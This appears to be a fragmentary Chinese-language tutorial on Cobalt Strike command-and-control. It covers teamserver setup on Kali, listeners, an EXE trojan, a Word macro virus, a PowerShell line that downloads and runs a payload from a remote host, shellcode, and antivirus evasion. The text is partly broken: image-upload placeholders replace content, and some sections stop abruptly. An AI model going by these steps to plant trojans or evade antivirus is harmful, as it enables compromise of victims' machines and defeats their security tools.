cobalt strike工具
c two 工具:
命令和控制的一个终端工具
cobalt strike:
metasploit 内网渗透纯图形化
‘打开存储位置,将server进行压缩成zip文件(否则火绒等安全工具直接杀掉)
解释:
复制到kali中进行解压缩。
对teamserver进行赋权,
输入kali 的IP和密码:
点击cobalt strike:工具:
端口号:50050
上线手法:
1.EXE:
点击windows stager payload
点击进去发现都需要listeners,我们设置一下listeners
回到kali中查看一下开放的端口:
当木马执行以后,他去找谁要命令?,建立了一个6666端口(可以建立多个端口)
回到kali中可以看到刚开放的6666端口:
现在回去生成木马:
生成一个.exe的木马执行文件点击之后我们在cobalt strike 中就可以看到反弹受害者信息
2.宏病毒:
新建一个word文档在视图选项卡—宏中添加宏
点击之后复制木马粘贴到宏中
保存完成之后双击一下word文件回到虚拟机找那个发现已经反弹上去了
3.Powershell:
提供了一个网页进攻的站
点击launch,可以看一下
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.9.47.130:80/a'))"
点击确定就会发现界面反弹出来记录信息
这就是上线的木马
shellcode:
最实用,网络上范围最广的是payload generator
放到左面记事本打开看一下:
使用工具做免杀:
图片转存中…(img-0xLayHKu-1702388297713)]
[外链图片转存中…(img-r4GoHxs1-1702388297713)]
[外链图片转存中…(img-ObdytB8A-1702388297713)]
使用工具做免杀: